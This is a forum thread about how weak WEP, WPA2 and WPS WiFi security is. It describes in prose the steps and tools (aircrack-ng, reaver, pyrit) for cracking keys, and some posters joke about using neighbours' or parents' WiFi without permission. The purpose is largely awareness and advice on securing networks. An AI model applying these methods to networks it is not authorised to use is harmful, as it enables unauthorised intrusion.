This is why you should not use WEP

So I'm a little drunk and board and I did this

[IMG]http://i1222.photobucket.com/albums/dd500/MrPete1985/th_20121107_005819.jpg[/IMG]

if you look at the larger picture here

http://i1222.photobucket.com/albums/dd500/MrPete1985/20121107_005819.jpg

you can see I cracked a 128 bit WEP key about 2 minutes after I started capturing data and I am a n00b at WiFi hacking, so if you are using WEP change to WPA2, hide your SSID and disable WPS

BTW this is a spare router I have, it took longer to set up the router than it did to break into it.

Now off to bed, I hope I'm not too hung over tomorrow

Actually, both WPA/WPA2 are a piece of cake... it just takes slightly longer, but it's a matter of time before you get the password. Which just proves that ISP's six strike rule is just ridiculous considering you can just crack your neighbor's wifi and download all the torrents you want (not saying you should do this at all). If you REALLY want to be safe, ethernet is the way to go.

i have cracked a wifi network before, used web, same way u did, but without a gui. that said, I just wanted the wifi, as up until now, all i've had were desktops, so it wasn't needed until now....

no.... wpa2 is very very hard to crack. unlike wep it does not transmit IV's... you have to capture a handshake which contains a salted hash of the password. you then have to brute force the hash or use a rainbow table, however since the salt is the essid, most rainbow tables are useless unless the essid is "linksys" or something common. so, unless your victem uses a short password, or a common dictionary word, your left to brute forcing it.... which is very time consuming, to get it cracked within a reasonable time of a few days, you would need a very powerful gpu cracking rig (like 2 or 3 5890's).

 

if you say that that is insecure, you are basicaly saying everything that transmits a hash or ticket is insecure (kerberos, ms-chap, sftp, every website that saves a password, teksyndicate, steam, ect..)

WPA/WPA2 is only a piece of cake if the user sets up a weak password, if it is 8 letters then you can brute force it in about half an hour using a CUDA card, or if you have WPS running Reaver can brute force the pin in about 8 hours

You can see that picture here: http://i1222.photobucket.com/albums/dd500/MrPete1985/20121025_213040.jpg

I look at security like this, you're not trying too keep people out just make it so much of a pain in the ass that they will go bother someone else

This is why my passwords are just random characters and numbers and very long. I just keep the key in my wallet.

 

ip whitelist... top security!!!!!

You bike?

Yup!

WPA2 security entirely depends on key choice - for all practical purposes strong keys are uncrackable:

PU5pYCQbyfiBnbR6Nog5 - 20 random letters/digits give ~119bit strength - uncrackable

6351649fdb88c46c592731572e2ca41727356fd6c96d960c6c244d1a09cb1fe4 - 64 random hexadecimal digits give full 256bit strength - uncrackable

Just a quick question, what is all of this being done with? Could someone explain briefly what the entire process of cracking a WPA/WPA2 key is?

I cracked a WEP access point in the original post, that is super easy just put your WiFi card into monitor mode, then you fake association to the access point, then you need to capture ivs, I did this by spamming APRs to the AP then finally when you have enough data you crack it using aircrack

Cracking WPA/WPA2 is harder, after your device in is monitor mode you start capturing data, then you de-authenticate a client that is on the AP to capture the handshake, once you have the handshake you use a dictionary attack or brute force the key, if you have a program like pyrit that can take advantage of CUDA and OpenGL then you can speed up cracking WPA

You can also brute force a WPS pin to obtain the WPA key, this is done with a tool called reaver, it took about 7 hours when I did it but you are only brute forcing an 8 digit number so it take far less time than to brute force a WPA key, once you have the pin you get the password and the ESSID

Some routers WPS is always running but some you need to press a button on the router to turn on WPS for device linking, and some routers will lock you out after too many wrong pins

With WPS you're not bruteforcing the entire 8 digit pin as a whole - if that was the case the attack would require 7 years not 7 hours. There is a critical fuckup in the WPS specification - the 8 digit pin is split into two 4 digit parts with each tested and reported as valid/invalid separately. Only 10000 combinations are required to crack WPS. It almost looks like WPS was designed to be easily crackable.

Lol I cracked my parents internet password after they took the internet away from me. They never found out until they decided I could have internet again

Whats the program called?

It's a linux based os called backtrack

http://www.backtrack-linux.org/

Backtrack Linux is the OS I used, and aricrack-ng is the software suit I used on the WEP connection, for the WPS shot I posted I used reaver, reaver also comes with a tool called wash that will show you any access point that are vulnerable to reaver.

My password is GOD

If the password is written down anywhere it instantly becomes less secure than any level of random characters, as long as you don't use only actualy words then a statement you remember is just as secure to a comptuer as any ammount of random characters. Though all of this only prevents brute force attacks.

This is all being done with pen tools. Well assuming these guys are taking advantage of the modenrn guis available today.

As the very first post in the thread shows backtrack5.. though i argue 4 worked a bit better for me.. Theres a few distros. Just search pen testing distros